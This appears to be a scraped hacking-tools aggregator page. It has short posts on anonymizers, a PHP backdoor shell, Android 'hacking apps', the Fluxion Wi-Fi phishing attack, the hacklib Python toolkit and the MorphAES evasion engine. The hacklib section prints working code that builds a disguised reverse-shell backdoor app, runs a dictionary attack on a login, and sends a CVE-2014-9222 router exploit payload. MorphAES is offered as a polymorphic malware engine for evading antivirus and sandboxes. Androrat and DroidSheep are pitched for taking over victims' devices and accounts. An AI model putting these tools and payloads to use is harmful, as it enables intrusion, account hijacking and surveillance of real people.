A bash script for anonymizing the public IP managing the connection to TOR and different VPNs providers - 4nonimizer

What is 4nonimizer?
It is a bash script for anonymizing the public IP used to browsing Internet, managing the connection to TOR network and to different VPNs providers (OpenVPN), whether free or paid. By default, it includes several pre-configured VPN connections to different peers (.ovpn files) and download the credentials. Also, it records each used IP that we use every 300 seconds in log files.
This script is enabled as a service in systemd systems and uses a default vpn (VPNBook) at system startup.

Installation
Download the repo using git, execute the command ./4nonimizer install in the directory, and follow the screen instructions, 4nonimizer will move to the directory /opt/ and installed as a service.
This script has full compatibility with Kali Linux, although it has been properly tested and should also work on other distributions like Debian, Ubuntu and Arch (Manjaro). However there could be some bugs, or unexpected performances (please comments if you find any!).

Options
Once installed 4nonymizer, enter the command 4nonimizer help to get the help, which shows all the available parameters:

Available VPNs
Currently it supports the following VPN providers:
- HideMyAss https://www.hidemyass.com/
- TorGuard https://torguard.net/
- VPNBook (by default) http://www.vpnbook.com/
- VPNGate http://www.vpngate.net/en/
- VPNMe https://www.vpnme.me/
- VPNKeys https://www.vpnkeys.com/

Install a new VPN
To install an additional vpn we have to use the following structure in order to the 4nonimizer be able to integrate and perform operations with it.
First, we have to create the following dir structure /vpn/ within 4nonimizer path:

In our example we create the folder /vpntest/ and within it placed all .ovpn files we have. If the files ovpn not have the certificate within each of them we put in the same folder as shown in the example certificate.crt .
In addition, we must place a file named pass.txt containing 2 lines: the first one with the username and the second one with the password, as shown below:

If we have correctly performed all steps when we execute the command 4nonimizer change_provider the menu will show our vpn:

As you can see in the picture, option [7] it is the vpn we've created.

Getting credencials and ovpn files automatically
If the VPN provider allows automation of credential and/or .ovpn files getting, 4nonimizer has standardized the following scripts names and locations:
- /opt/4nonimizer/vpn/provider/ vpn-get-pass.sh

- /opt/4nonimizer/vpn/provider/ vpn-get-ovpn.sh

4nonimizer automatically detect the presence of both scripts and indicate (Auto-pass Login) or (Auto-get OVPN) if applicable.

Extras
- Execute 'source 4nonimizer' to activate autocompletation of parameters.
- Copy .conkyrc in your home directory to load a 4nonimizer template and execute conky.

References
- http://www.hackplayers.com/2016/08/tuto-enmascarar-ip-linux-vpn-tor.html
- http://www.hackplayers.com/2016/10/4nonimizer-un-script-para-anonimizar-ip.html

Versions
- 1.0-beta codename .bye-world! 5/10/2016

Download 4nonimizer

Read More

Python Client with PHP Shell - tinyshell

python Client with php shell , allows to connect and send commands over current protocol using POST and GET Requests

Features

1. connect with direct session with no need for reverse connection .
2. support password protection .
3. can be binded to any file with no damage .
4. using GET/POST request with error handling .

Usage
the project contains of two files :

1. Remote shell python file : considered as Client to connect with target python remote shell.py url password
   
2. php shell php file : considered as php backdoor . password can be edited manually by modifing the code .
   

Credits
Lawrence Amer - Vulnerability Lab Researcher .

Video

Download tinyshell

Read More

Top 10 Best Apps 2016 - Android Hacking

Do you wanna know how to turn your smartphone in hacking machine ? then you came at  right place . let’s talk about Top 10 Best Android Hacking Apps.

Obs, I'm not responsible for your act

Top 10 Best Android Hacking Apps

#1 Androrat

#AndroRat  ‘s meaning is  Android Remote Administration Tool. androrat is a remote administration tool which is used to control another device without physical access to victim’s device!

see features of Androrat

ºGet contacts (and all theirs informations)
ºGet call logs & Get all messages
ºLocation by GPS/Network
ºMonitoring received messages in live
ºMonitoring phone state in live (call received, call sent, call missed..)
ºTake a picture from the camera & Stream sound from microphone (or other sources..)
ºStreaming video (for activity based client only)
ºDo a toast & Send a text message
ºGive call & Open an URL in the default browser


Download Androrat



#2 DroidBox

DroidBox is developed to offer dynamic analysis of Android applications. The following information is described in the results, generated when analysis is complete:

features of Droidbox

ºHashes for the analyzed package
ºIncoming/outgoing network data
ºFile read and write operations
ºStarted services and loaded classes through DexClassLoader
ºInformation leaks via the network, file and SMS
ºCircumvented permissions
ºCryptographic operations performed using Android API
ºListing broadcast receivers
ºSent SMS and phone calls


Download DroidBox



#4 zANTI


zANTI is a penetration testing toolkit  developed by Zimperium Mobile Security for cyber security professionals. Basically, it allows you to simulate malicious attacks on a network. With the help of zANTI, you will be able to perform various types of operations such as MITM attacks, MAC address spoofing, scanning, password auditing, vulnerability checks and much more. In short, this android toolkit is a perfect companion of hackers.  How to use zANTI for Hacking .  this app is very professional in android hacking apps.

features of zANTI

ºuser can Change device’s MAC address.
ºthey can Create a malicious WiFi hotspot.
ºHijack HTTP sessions.
ºCapture downloads.
ºModify HTTP requests and responses.
ºExploit routers.
ºAudit passwords.
ºCheck a device for shellshock and SSL poodle vulnerability.


Download zANTI


#5 APK Inspector

APKinspector is a powerful GUI tool to analyse the Android apps , goal for this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code , edit remove credits license etc.


Download APK Inspector


#6 Droid Sheep

DroidSheep can use victims’ accounts, gaining access to sites that don’t use a secured and encrypted SSL connection that may make HTTPS vulnerable . DroidSheep requires root privileges. While popular sites like Yahoo, Google, and Facebook now support encrypted HTTPS connections that aren’t vulnerable to a tool like DroidSheep, there surely are hundreds of others that are.

Droidsheep apk is also a tool to hack Facebook, Twitter and many other site via your android device. Droidsheep uses the method of cookie Hijacking to hack these accounts. Droidsheep don’t reveal you the passwords and email but you can access Facebook accounts directly without them, i.e. this app provides a ink to get access to other accounts directly.this tool is beast one in the list of android hacking apps.


Download Droid Sheep



#7 Arpspoof

Arpspoof is a tool for network auditing originally written by Dug Song as a part of his dsniff package. Arpspoof  redirects traffic on the local network by forging ARP replies and sending them to either a specific target or all the hosts on the local network paths ,arpsoof in list of my favorite android hacking apps.


Download Arpspoof



#8 Nmap for Android

Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. Nmap for android is a Nmap apps for your phone! Once your scan finishes you can e-mail the results. This application is not a official apps but it looks good so that was one of in android hacking apps.


Download NmapA



#9 dSploit 

dSploit is a penetration testing suite developed by Simone Margaritelli for the Android operating system. which consists of several modules that are capable to perform network security assessments on wireless networks,must read guide on


Download dSploit


#10 Wifikill

Wifi Kill Pro Hacking Tool

WiFiKill  is an android tool that you can use to disable internet connection for a device on constant WiFi network. It is a light-weight tool with simple interface , you can kick any user in same wifi network which means you can prevent your neighbors to using your wifi connection using wifikill


Download Wifi Kill Pro


By OffSec

Read More

Transparent Proxy through TOR, I2P, Privoxy, Polipo and modify DNS - anonym8

Transparent Proxy through TOR, I2P, Privoxy, Polipo and modify DNS, for a simple and better privacy and security; Include Anonymizing Relay Monitor (arm), macchanger, hostname and wipe (Cleans ram/cache & swap-space) features. Tested on Debian, Kali, Parrot to use the graphical interface, you'll need to install separately GTKdialog and libvte.so.9 and i2p

Script requirements are:

• Tor        
• macchanger 
• resolvconf 
• dnsmasq    
• polipo     
• privoxy           
• arm        
• libnotify  
• curl
• bleachbit

they'll be automatically installed.
Open a root terminal and type:

cd anonym8_directory I.Ex: cd /home/toto/Desktop/anonym8-master
chmod +x INSTALL.sh
bash INSTALL.sh

you're done!

For more security, use Firefox!
here's some useful Firefox add on:
profil manager => https://ftp.mozilla.org/pub/utilities/profilemanager/1.0/
random agent spoofer => https://addons.mozilla.org/en-US/firefox/addon/random-agent-spoofer/  
no script => https://addons.mozilla.org/en-US/firefox/addon/noscript/
ublock origin => https://addons.mozilla.org/en-US/firefox/addon/ublock-origin/
HTTPS everywhere => https://addons.mozilla.org/fr/firefox/addon/https-everywhere/  

Reboot your system and enjoy!

@HiroshimanRise
#anonym8 (Privacy Friend)

Download anonym8

Read More

WPA/WPA2 Security Hacked Without Brute Force - Fluxion

Fluxion is a remake of linset by vk496 with less bugs and more features. It's compatible with the latest release of Kali (Rolling). Latest builds (stable) and (beta) HERE . If you new, please start reading the wiki

Fluxion GUI

How it works

• Scan the networks.
• Capture a handshake (can't be used without a valid handshake, it's necessary to verify the password)
• Use WEB Interface *
• Launch a FakeAP instance to imitate the original access point
• Spawns a MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the FakeAP and enter the WPA password.
• A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script
• A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password
• Each submitted password is verified by the handshake captured earlier
• The attack will automatically terminate, as soon as a correct password is submitted

Requirements
A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling. Kali 2 & 2016 support the latest aircrack-ng versions. A external wifi card is recommended.

Credits

1. Deltax @FLuX and Fluxion main developer
2. Strasharo @Fluxion help to fix DHCPD and pyrit problems, spelling mistakes
3. vk496 @Linset main developer of linset
4. ApatheticEuphoria @WPS-SLAUGHTER,Bruteforce Script,Help with Fluxion
5. Derv82 @Wifite/2
6. Princeofguilty @webpages
7. Photos for wiki @ http://www.kalitutorials.net

Useful links

1. wifislax
2. kali
3. linset
4. ares

Download Fluxion

Read More

Console Web Vulnerability Scan Tools - Syhunt ScanTools

Syhunt released the new generation of its console-based scan tools, simply called ScanTools. The first release of ScanTools comes with four console applications: - ScanURL,ScanCode, ScanLog and ScanConf, incorporating the functionality of the scanners Syhunt Hybrid/Dynamic, Syhunt Code, Syhunt Insight and Syhunt Harden respectively. Whether you want to scan a live web application, source code files, web server logs or configuration files for vulnerabilities, weaknesses and more, ScanTools can help you start the task with a single line command. Syhunt ScanTools is available for download as a freeware portable package or as part of Syhunt Community.

Installation

Download Information

Syhunt ScanTools is included with the latest release of Syhunt. It is located in the installation directory of the suite.

Please note that the full-featured version of the tools is only available for registered users.

System Requirements

1. 512 MB of memory
2. 200 MB of free disk space
3. Internet connection (optional for remote scanning)
4. Windows XP, 2003, 2008, Vista, 7, 8 or 10.

Usage

Just run any of the Scan*.exe apps, which are located in the installation directory of Syhunt Hybrid, with no parameters to see usage instructions.

Supported Hunt Methods

For detailed information about scan methods, see the Hunt Methods page.

Scanning IPv6 addresses

Scanurl fully supports the scanning of IPv6 addresses. To scan an IPv6 target, enclose the address in square brackets, eg:

Scanurl http://[2001:4860:0:2001::68]

Black Box (Dynamic Scan)

1. Go to the directory Syhunt Hybrid is installed using the command prompt.
2. Use the following command-line:

 Scanurl [starturl] -hm:[a huntmethod]] -gr

 Example:
 Scanurl http://www.somehost.com -hm:appscan -gr

White Box (Source Code Scan)

1. Go to the directory Syhunt is installed using the command prompt.
2. Example command-line:

 Scancode C:\WWW\Docs\ -gr

Gray Box (Dynamic + Code Scan)

1. Go to the directory Syhunt Hybrid is installed using the command prompt.
2. Use the following command-line:

 Scanurl [starturl] -hm:[a huntmethod]] -srcdir:"[SourceDir]" -gr

 Example:
 Scanurl localhost -hm:appscan -srcdir:"C:\WWW\Docs\" -gr

Note: if you already entered the source code directory for the target host using the Syhunt Hybrid GUI in a past scan it is not necessary to assign it again using the -srcdir command.

Download  Syhunt ScanTools

Read More

Pentesting, Port Scanning, and Logging in anywhere with Python - hacklib

Toolkit for hacking enthusiasts using Python.
hacklib is a Python module for hacking enthusiasts interested in network security. It is currently in active development.

Installation
To get hacklib, simply run in command line:

pip install hacklib

hacklib also has a user interface. To use it, you can do one of the following:
Download hacklib.py and run in console:

python hacklib.py
----------------------------------------------
Hey. What can I do you for?


Enter the number corresponding to your choice.

1) Connect to a proxy
2) Target an IP or URL
3) Lan Scan
4) Create Backdoor
5) Server
6) Exit

Or if you got it using pip:

import hacklib
hacklib.userInterface()

Dependencies
Not all classes have external dependencies, but just in case you can do the following:

hacklib.installDependencies()

Usage Examples
Reverse shell backdooring (Currently only for Macs):

import hacklib

bd = hacklib.Backdoor()
# Generates an app that, when ran, drops a persistent reverse shell into the system.
bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures')
# Takes the IP and port of the command server, the OS of the target, and the name of the .app

Generated App:
Listen for connections with Server:

>>> import hacklib
>>> s = hacklib.Server(9090) # Bind server to port 9090
>>> s.listen() 
New connection ('127.0.0.1', 50011) # Target ran the app (connection retried every 60 seconds)
bash: no job control in this shell
bash$ whoami # Type a command
leon
bash$ # Nice!

Universal login client for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins:

import hacklib

ac = hacklib.AuthClient()
# Logging into a gmail account
htmldata = ac.login('https://gmail.com', 'email', 'password')

# Check for a string in the resulting page
if 'Inbox' in htmldata: print 'Login Success.'
else: print 'Login Failed.'

# For logins using HTTP Basic Auth:
try: 
    htmldata = ac.login('http://somewebsite.com', 'admin', 'password')
except: pass #login failed

Simple dictionary attack using AuthClient:

import hacklib

ac = hacklib.AuthClient()
# Get the top 100 most common passwords
passwords = hacklib.topPasswords(100)

for p in passwords:
    htmldata = ac.login('http://yourwebsite.com/login', 'admin', p)
    if htmldata and 'welcome' in htmldata.lower():
        print 'Password is', p
        break

Port Scanning:

from hacklib import *

ps = PortScanner()
ps.scan(getIP('yourwebsite.com'))
# By default scans the first 1024 ports. Use ps.scan(IP, port_range=(n1, n2), timeout=i) to change default

# After a scan, open ports are saved within ps for reference
if ps.portOpen(80):
    # Establish a TCP stream and sends a message
    send(getIP('yourwebsite.com'), 80, message='GET HTTP/1.1 \r\n')

Misfortune Cookie Exploit (CVE-2014-9222) using PortScanner:

>>> import hacklib

# Discovery
>>> ps = hacklib.PortScanner()
>>> ps.scan('192.168.1.1', (80, 81))
Port 80:
HTTP/1.1 200
Content-Type: text/html
Transfer-Encoding: chunked
Server: RomPager/4.07 UPnP/1.0
EXT:
# The banner for port 80 shows us that the server uses RomPager 4.07. This version is exploitable.

# Exploitation
>>> payload = '''GET /HTTP/1.1
Host: 192.168.1.1
User-Agent: googlebot
Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Cookie: C107351277=BBBBBBBBBBBBBBBBBBBB\x00''' + '\r\n\r\n'
>>> hacklib.send('192.168.1.1', 80, payload)
# The cookie replaced the firmware's memory allocation for web authentication with a null bye.
# The router's admin page is now fully accessible from any web browser.

FTP authentication:

import hacklib
ftp = hacklib.FTPAuth('127.0.0.1', 21)
try:
    ftp.login('username', 'password')
except:
    print 'Login failed.'

Socks4/5 proxy scraping and tunneling:

>>> import hacklib
>>> import urllib2
>>> proxylist = hacklib.getProxies() # scrape recently added socks proxies from the internet
>>> proxy = hacklib.Proxy()
>>> proxy.connect(proxylist) # automatically find and connect to a working proxy in proxylist
>>> proxy.IP
u'41.203.214.58'
>>> proxy.port
65000
>>> proxy.country
u'KE'
# All Python network activity across all modules are routed through the proxy:
>>> urllib2.urlopen('http://icanhazip.com/').read() 
'41.203.214.58\n'
# Notes: Only network activity via Python are masked by the proxy.
# Network activity on other programs such as your webbrowser remain unmasked.
# To filter proxies by country and type:
# proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5')

Word Mangling:

from hacklib import *

word = Mangle("Test", 0, 10, 1990, 2016)

word.Leet()
word.Numbers()
word.Years()

Output:

T3$t
Test0
0Test
...snip...
Test10
10Test
Test1990
1990Test
...snip...
Test2016
2016Test

Pattern Create:

from hacklib import *

Pattern = PatternCreate(100)

Pattern.generate()

Output:

Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A

Pattern Offset:

from hacklib import *

Offset = PatternOffset("6Ab7")

Offset.find()

Output:

[+] Offset: 50

Download python-hacklib

Read More

PenTest Oriented Web Browser - Sandcat Browser 5.3

Sandcat is a lightweight multi-tabbed web browser that combines the speed and power of Chromium and Lua. Sandcat comes with built-in live headers, an extensible user interface and command line console, resource viewer, and many other features that are useful for web developers and pen-testers and when you need to examine live web applications. For more details, visit http://www.syhunt.com/sandcat/ . See also the docs directory and credits section below for a few more details about the Sandcat architecture.

Directories

• /docs - Lua API documentation
• /packs - contents of uncompressed pack files
  • /Common - common CSS, widgets and scripts package (Common.pak)
  • /Resources - resources package (Resources.pak)
• /src - the main executable source and built-in resource files
  • /core - user interface source
  • /html - user interface resources (HTML)
  • /lua - Lua API source

Download
Compiled binaries for Windows can be downloaded from the links below.

• 5.3 64-bit
• 5.3 32-bit
• 5.3 32-bit with Pen-Tester Tools (included as part of Syhunt Community)

Compiling
For compiling Sandcat, you will just need Catarinka and pLua .
The entire Sandcat user interface is created during runtime, so there is no need to install third-party components in the IDE - you can just add the dependencies listed above to the library path and hit compile. It compiles under Delphi 10 Seattle down to XE2. If you are trying to compile it with Lazarus, let me know which errors you get - I will try to do the same soon.
Some work is still needed before a Mac or Linux version materializes.

ChangeLog

5.3

This upgrade brings more stability on newer OSes.

• Fixed: constant freeze during navigation under some Windows installations (IPC related).
• Fixed: AV when restoring minimized Sciter dialog.
• Replaced the Selenite library with Catarinka.

5.2

• Added the ability to create offscreen Chromium renderers using the Lua API.
• Improved tab status bar text handling.
• Improved task script error handling.
• Improved live headers.
• Improved startup for Windows 10 compatibility.
• Make window close work as cancel in Preferences dialog.
• The Chromium library was upgraded to the latest release.
• Some extensive code cleanup.
• Minor user experience improvements.
• 64-bit version now available separately (special thanks for @RJ35 for fixing a Chromium

related crash under Win64 environments making this release possible)

• Fixed: a rare crash when switching tabs.

5.1

This release address minor issues like a crash when loading a homepage during startup or calling the context-menu from a loaded web page.

5.1 Beta 3

This release uses the latest Chromium binaries. This fixes some instability issues when browsing with the live headers enabled.

5.1 Beta 2

This release is focused on stability and performance, as well as some other improvements such as being able to ignore certificate errors while navigating and open PDF files.

Here is what changed in version 5.1:

• Switched to the WACEF Chromium framework and the latest Chromium binaries. This significantly improves speed and stability, and fixes some issues during shutdown.
• Most preferences now get applied instantly (just need to open a new tab instead of restarting).
• Added a certificate error dialog.
• Added a PDF viewer plugin.
• Added proxy support.
• Improved Lua integration.
• Minor compiler optimizations.
• The OpenSSL library was upgraded to the latest release.
• The Selenite library was upgraded to the latest release.

5.0

We're excited to announce a brand new version of our Sandcat Browser (codenamed Catarinka browser), now available as a free, open source project - because many people asked for it, the entire source for Sandcat is now available on GitHub. Feel free to fork it, examine it, contribute code, send suggestions, report or fix issues.

Here is what changed in version 5.0 beta 1:

• Faster startup and responsiveness.
• Huge refactoring and cleanup of the current code.
• The Chromium library was upgraded to the latest release (incredibly fast!).
• Improved compatibility with 64-bit Windows editions.
• Improved source code editor.
• Available as free, open source/community edition (under a BSD-3-Clause license).
• Built using components and libraries from the Catarinka toolkit (also made open source at the same time with this release and under the same license).
• Includes the Selenite Lua library - a multi-purpose set of Lua extensions developed to make the development of Lua extensions easier in Sandcat. The code for Selenite is now open source, under the MIT license. The library documentation is available here.
• Fixed: output of the SHA1 and the full URL encoders that come with the pen-tester pack. 
• 
  

Download Sandcat Browser

Read More

IDPS & SandBox & AntiVirus STEALTH KILLER - MorphAES

MorphAES is the world's first polymorphic shellcode/malware engine, with metamorphic properties and capability to bypass sandboxes, which makes it undetectable for an IDPS, it's cross-platform as well and library-independent.

Properties:

• Polymorphism (AES encryption)
• Metamorphism (logic and constants changing)
• Platform independent (Linux/BSD/Windows)
• IDPS stealthing (the total number of possible signatures is more the number of atoms in the universe for one given code)
• Sandbox evasion (special assembly instructions)
• Realism (no null bytes)
• Can produce executables (malwares)
• Input code can have arbitrary length

Dependencies for the morpher:

• Python 2.7 - main engine
• Python Crypto 2.6 - for encryption

Dependencies for the code execution:

• 64-bit Intel AES-NI - for decryption

Nonetheless, there are some limitations (aka white-hat aspects):

• Metamorphism is not very robust and can be detected using regular expressions (but can be improved pretty easily)
• Unicode null bytes might still work (but who cares?)
• It will only work on 64-bit Intel processors with AES-NI support, but since all the user's PCs (like Pentium, Celeron, i3, i5, i7) and the industry's servers (like Xeon) have it, it's more a specification, rather than a limitation, thus a 32-bit implementation is unpractical
• Almost any shellcode is guarantee to work however, an arbitrary code (malware) doesn't
• Windows/BSD PoC and executables are in progress...

How it works

1. Shellcode padding with NOPs (since AES is a block cipher)
2. Shellcode encryption with a random key using AES-128-ECB (not the best, but the simplest) - polymorphism
3. Constants randomization, logic changes, instructions modification and rewriting - metamorphism

HowTo
For Linux:

sudo apt-get install python python-crypto

Execute the Pyhton script and enter your shellcode or nothing for a default Linux shell. You can specify your own execution address as well.
It is possible to build and execute on Windows/BSD/Mac as well, but I'm still testing it.
You can also use the Linux PoC in assembly:

as shellcode.s -o shellcode.o
ld shellcode.o -o shellcode
./shellcode

Every file is commented and explained

Tests
At this point, it should be pretty obvious that, the hashes would be different every time, but let's compare SSDEEPes of 2 Linux executables of the same shellcode:

• 96:GztTHyKGQh3lo6Olv4W4zS/2WnDf74i4a4B7UEoB46keWJl09:Gzty6VOlvqSTDflmNroh,
• 96:GQtT23yKmFUh3lo6OlOnIrFS4rkoPPf74i4a4B7UEoB46keWJ5:GQtCGWVOlOWFSsPflmNroh,

Well, there's something in common, but globally those are 2 different signatures, now what about the shellcode it-self:

• 48:eip2bR2LRNtRPORDGRopRBXR3cRzER2vRU9BnH6ksr:Srn+,
• 48:6RjNeR2IRN7RPWRDeRokRB5R3xRz3R28RUxFT2+75eFK9iKMAdXAJKo:O9Tdwoo,

Almost totally different signatures for the same morphed shellcode!
At the publication date, the executable was detected as a shellcode only by 2 out of 53 antiviruses (AVG and Ikarus) on virustotal , but now, it just fails to analyze.
malwr's with cuckoo2 doesn't see anything suspicious.
On the reverser's perspective, IDA won't see anything either.
Radare2 would show the real instructions only if assembled by the assembler it-self however, it doesn't detects any crypto or suspicious activity for the executable.
Althrough, I didn't test it personally, I think that FortiSandbox, Sophos Sandstorm, Blue Coat, GateWatcher and their derivatives might fail badly...

To put it in the nutshell
Basically, it can transform a script-kid's code (or a known-one ) into a zero-day.
IDPS will fail because, it's almost impossible to make a signature and difficult to make a regular expression or heuristic analysis.
Most of the sandboxes doesn't use Intel's AES-NI instructions directly, so they will not execute the code, so "everything is fine" for them, whereas it's not.
The only way to defeat this type of shellcode/malware is to use an appropriate sandboxing or/and an AI.
Notice that, the whole execution is done by a pure assembly, no Python (or shitty OpenSSL) is needed for the shellcode's/malware's execution since, I use built-in assembly instructions only, thus it's system-independent (surely, you will have to assemble it for each-one by adapting the instructions/opcodes, but they are still same).

Notes
This is still a work in progress, I will implement Windows and BSD/Mac engines and PoCs ASAP.
IDPSes and sanboxes suck.

"Tradition becomes our security, and when the mind is secure it is in decay."

Jiddu Krishnamurti

Download MorphAES

Read More

Onion URL Inspector - ONIOFF

A simple tool - written in pure python - for inspecting Deep Web URLs (or onions).
Compatible with Python 2.6 & 2.7.
Author: Nikolaos Kamarinakis ( nikolaskama.me )


Installation
You can download ONIOFF by cloning the Git Repo and simply installing its requirements:

$ git clone https://github.com/k4m4/onioff.git
$ cd onioff
$ pip install -r requirements.txt

Usage
Usage: python onioff.py {onion} [options]
To view all available options run:

$ python onioff.py -h

NOTE : In order for ONIOFF to work, Tor must be correctly configured and running.

Demo
Here's a short demo:

(For more demos click here )

Download ONIOFF

Read More